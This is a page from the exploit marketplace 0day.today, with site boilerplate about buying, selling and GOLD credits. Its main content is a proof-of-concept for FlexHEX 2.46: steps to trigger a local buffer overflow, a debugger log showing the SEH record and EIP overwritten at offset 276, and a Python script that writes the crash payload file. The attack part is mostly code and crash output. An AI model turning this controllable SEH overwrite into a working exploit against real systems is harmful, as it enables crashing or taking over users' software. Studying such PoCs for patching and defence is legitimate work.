0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FlexHEX 2.46 - Denial of Service SEH Overwrite Exploit
# Exploit Title: FlexHEX v2.46 - Denial of Service (PoC) and SEH overwritten Crash PoC # Discovery by: Rafael Pedrero # Vendor Homepage: http://www.flexhex.com/order/?r1=iNetShortcut&r2=fhx1 # Software Link : http://www.flexhex.com/order/?r1=iNetShortcut&r2=fhx1 # Tested Version: 2.46 # Tested on: Windows XP SP3 # Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow # Steps to Produce the Crash: # 1.- Run FlexHEX.exe # 2.- Go to Menu "Stream" - "New Stream" and copy content of FlexHEX_SEH_Crash.txt to clipboard # 3.- Paste the content into the field: 'Stream Name:' # 4.- Click 'OK' button and you will see a crash. ''' Log data, item 21 Address=0BADF00D Message= SEH record (nseh field) at 0x0012dde8 overwritten with unicode pattern : 0x006a0041 (offset 276), followed by 20 bytes of cyclic data after the handler SEH chain of main thread Address SE handler 0012DDFC FlexHEX.00420042 00420042 8BC13B2C 4E8B3C46 *** CORRUPT ENTRY *** EAX 00410041 FlexHEX.00410041 ECX 00000000 EDX 00000000 EBX 0012FA18 ESP 0012DE3C UNICODE "AAAAAAAAAABBBB" EBP 00410041 FlexHEX.00410041 ESI 0012DE78 EDI 0012E69C EIP 00410041 FlexHEX.00410041 C 0 ES 0023 32bit 0(FFFFFFFF) P 0 CS 001B 32bit 0(FFFFFFFF) A 1 SS 0023 32bit 0(FFFFFFFF) Z 0 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FFDF000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G) ST0 empty ST1 empty ST2 empty ST3 empty ST4 empty ST5 empty ST6 empty ST7 empty 3 2 1 0 E S P U O Z D I FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 ''' #!/usr/bin/env python nseh = "BB" seh = "BB" junk = "\x41" * 276 crash = junk + nseh + seh f = open ("FlexHEX_SEH_Crash.txt", "w") f.write(crash) f.close() # 0day.today [2024-05-20] #